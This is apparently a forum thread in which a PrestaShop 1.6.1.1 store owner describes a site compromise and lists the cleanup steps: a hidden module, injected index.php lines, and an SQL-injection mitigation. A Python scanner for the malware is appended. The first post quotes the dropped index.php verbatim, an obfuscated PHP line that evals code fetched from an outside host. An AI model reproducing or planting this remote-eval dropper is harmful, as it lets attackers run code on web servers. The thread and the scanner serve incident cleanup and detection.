
Prestashop 1.6.1.1 VIRUS delete translation file.


Kingtonino


Hi, I have PS 1.6.1.1 and I think I was a victim of viruses. The site no longer has a translation, and the lang folder of my theme (default-bootstrap) automatically deletes the language php file and the index. A new index.php, sitemap.xml, robots.txt and google2ebc7d2288acf467.html are created in the lang folder. The content of index.php is:

<?=/****/@/*55555*/null; /******/@/*55555*/error_reporting(0);/****/@/*55555*/null; /******/@/*55555*/eval/******/("?>".file_get_contents("https://jeniferseo.my.id/db.txt"))/* *****/ /*P*/?>

Can anyone help me? I would be grateful. A thousand thanks


This is a very old version that is susceptible to attacks. In such a case I clean the files manually and check the server logs to see where the attacker got in. Check which files were last modified and whether they have any additional malicious code added. After cleaning, I recommend updating the store to the latest safe version.


I SOLVED IT. I found a hidden module, not installed by me, called SENDINBLUE. This module is not visible on the site, but only with FTP. I solved it like this:

1. Deleted the SENDINBLUE folder.
2. Deleted Scan.php from the root of the site.
3. Deleted the first strings from the index.php file, because they were not present in the index.php of the backup.
4. Deleted the virus files created in the lang folder (index.php, sitemap.xml and robots.txt) and restored the language files located in the theme's lang folder (index.php, it.php, en.php).


Remember that version 1.6 has a security hole that gives easy access to the database. It would be good if you used this solution:

What to do to keep your shop safe

First of all, make sure that your shop and all your modules are updated to their latest version. This should prevent your shop from being exposed to known and actively exploited SQL injection vulnerabilities.

According to our current understanding of the exploit, attackers might be using MySQL Smarty cache storage features as part of the attack vector. This feature is rarely used and is disabled by default, but it can be enabled remotely by the attacker. Until a patch has been published, we recommend physically disabling this feature in PrestaShop’s code in order to break the attack chain.

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
    include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
    $smarty->caching_type = 'mysql';
}

 

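The index.php quoted in the first post splits its tokens with `/*...*/` comments and `@`, so a plain search for `eval(` across the shop's files will not find copies of it. The following Python scanner is an added example, not code from any poster in this thread or from PrestaShop; it strips that noise before matching, and its function names, sample strings and placeholder URL are constructed for illustration.

```python
import os
import re
import sys

# The dropper hides its tokens behind /*...*/ comments and the @ operator, so a
# plain grep for "eval(" misses it. Strip that noise first, then match.
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REMOTE_EVAL = re.compile(
    r"\beval\s*\(.{0,200}?\bfile_get_contents\s*\(\s*[\"']https?://",
    re.I | re.S,
)

# Constructed sample in the same shape as the index.php quoted in the thread;
# the URL is a placeholder.
SAMPLE_DROPPER = (
    '<?=/****/@/*55555*/null; /******/@/*55555*/error_reporting(0);'
    '/******/@/*55555*/eval/******/("?>".file_get_contents'
    '("https://example.invalid/db.txt"))/* *****/ /*P*/?>'
)
# Constructed benign line that must not be flagged.
SAMPLE_BENIGN = '<?php $feed = file_get_contents("https://example.invalid/feed.xml"); ?>'


def strip_php_noise(source):
    """Drop block comments and @ so split-up tokens become contiguous again."""
    return BLOCK_COMMENT.sub("", source).replace("@", "")


def looks_like_remote_eval(source):
    """True if the code evals content fetched from an http(s) URL."""
    return REMOTE_EVAL.search(strip_php_noise(source)) is not None


def scan_tree(root):
    """Return sorted paths of .php files under root that match the pattern."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    if looks_like_remote_eval(handle.read()):
                        hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("suspicious:", hit)
```

A match is only a lead for the manual review of recently modified files and server logs recommended earlier in the thread; the pattern covers this one dropper shape and nothing else.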
